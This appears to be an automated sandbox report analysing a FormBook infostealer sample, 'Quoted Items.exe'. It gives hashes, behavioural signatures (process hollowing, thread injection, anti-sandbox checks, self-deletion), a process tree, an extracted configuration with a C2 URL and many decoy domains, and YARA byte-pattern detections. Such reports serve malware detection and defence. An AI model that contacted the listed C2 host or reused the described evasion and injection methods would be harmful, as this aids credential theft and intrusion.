Edit tour

Windows Analysis Report
Quoted Items.exe

Overview

General Information

Sample Name:	Quoted Items.exe
Analysis ID:	626564
MD5:	901567a408d891fc0f67e15221d1b7e4
SHA1:	dba16ac8c7523f640494843471a5f9d4fb211bef
SHA256:	70c9cf50b937cdf3015d4e7fdffbe1c8ab4820eaca74c7373f0760fa905a494a
Tags:	exexloader
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Self deletion via cmd delete

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Quoted Items.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Quoted Items.exe" MD5: 901567A408D891FC0F67E15221D1B7E4)

Quoted Items.exe (PID: 6688 cmdline: C:\Users\user\Desktop\Quoted Items.exe MD5: 901567A408D891FC0F67E15221D1B7E4)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmstp.exe (PID: 612 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)

cmd.exe (PID: 6552 cmdline: /c del "C:\Users\user\Desktop\Quoted Items.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gulabmonga.com/gfge/"], "decoy": ["loopcoalition.com", "hd126.com", "elioguion.net", "defitrader.academy", "exactemi.com", "angeloacierno.com", "range4tis.com", "ilovekuduro.us", "mydealsstation.com", "jerichoprinting.com", "birdcafe605.com", "freemansrepublic.com", "driedplasma.com", "valuableconnect.com", "anthonyvid.xyz", "theydo.support", "devnetsecops.com", "cryptork.tech", "ufheur678.store", "lavenderspa586.com", "scandicinvestmentholding.com", "youenfangtex.com", "gratefulgrandmas.com", "ampersandtalent.net", "wippychick.com", "stamping.digital", "trixes.net", "popinticket.com", "ivyleaguereading.com", "killerinktnpasumo3.xyz", "greatyuwx.com", "royaltortoisecookieco.online", "quinten-and-sam.com", "mobile-sh.com", "reacjs.com", "hongbufang.net", "winemenuimports.com", "nashuatelegrpah.com", "nicorgaa.com", "outlanfd.com", "personalitideal.com", "mhhj666.com", "themethodcollective.com", "36536a.com", "bijit.xyz", "yoursinsoccer.net", "cryptoducks.club", "defuw.com", "kangley.net", "hacvm.com", "zhouyihong.top", "takut5.com", "kreditnekarticers.com", "koigo-wp.com", "52byhx.com", "phaghpanah.com", "apqlds.com", "karxsba2ix.xyz", "demasinfimo.quest", "unitytrstbnk.com", "panasonic-hcm.com", "27530amethystway.com", "idealftz.xyz", "conventionline.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x39cc8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3a052:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x61ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x61e72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17f7f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x17fb82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x45d65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6db85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18b895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x45851:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6d671:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18b381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x45e67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6dc87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18b997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x45fdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6ddff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x18bb0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3aa6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6288a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18059a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x48189:$sqlite3step: 68 34 1C 7B E1 0x4829c:$sqlite3step: 68 34 1C 7B E1 0x6ffa9:$sqlite3step: 68 34 1C 7B E1 0x700bc:$sqlite3step: 68 34 1C 7B E1 0x18dcb9:$sqlite3step: 68 34 1C 7B E1 0x18ddcc:$sqlite3step: 68 34 1C 7B E1 0x481b8:$sqlite3text: 68 38 2A 90 C5 0x482dd:$sqlite3text: 68 38 2A 90 C5 0x6ffd8:$sqlite3text: 68 38 2A 90 C5 0x700fd:$sqlite3text: 68 38 2A 90 C5 0x18dce8:$sqlite3text: 68 38 2A 90 C5 0x18de0d:$sqlite3text: 68 38 2A 90 C5 0x481cb:$sqlite3blob: 68 53 D8 7F 8C 0x482f3:$sqlite3blob: 68 53 D8 7F 8C 0x6ffeb:$sqlite3blob: 68 53 D8 7F 8C 0x70113:$sqlite3blob: 68 53 D8 7F 8C 0x18dcfb:$sqlite3blob: 68 53 D8 7F 8C 0x18de23:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Quoted Items.exe PID: 6360	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.Quoted Items.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.Quoted Items.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.Quoted Items.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
4.2.Quoted Items.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Quoted Items.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Quoted Items.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
4.0.Quoted Items.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.Quoted Items.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.Quoted Items.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
4.0.Quoted Items.exe.400000.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.0.Quoted Items.exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.Quoted Items.exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0.2.Quoted Items.exe.41791d0.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
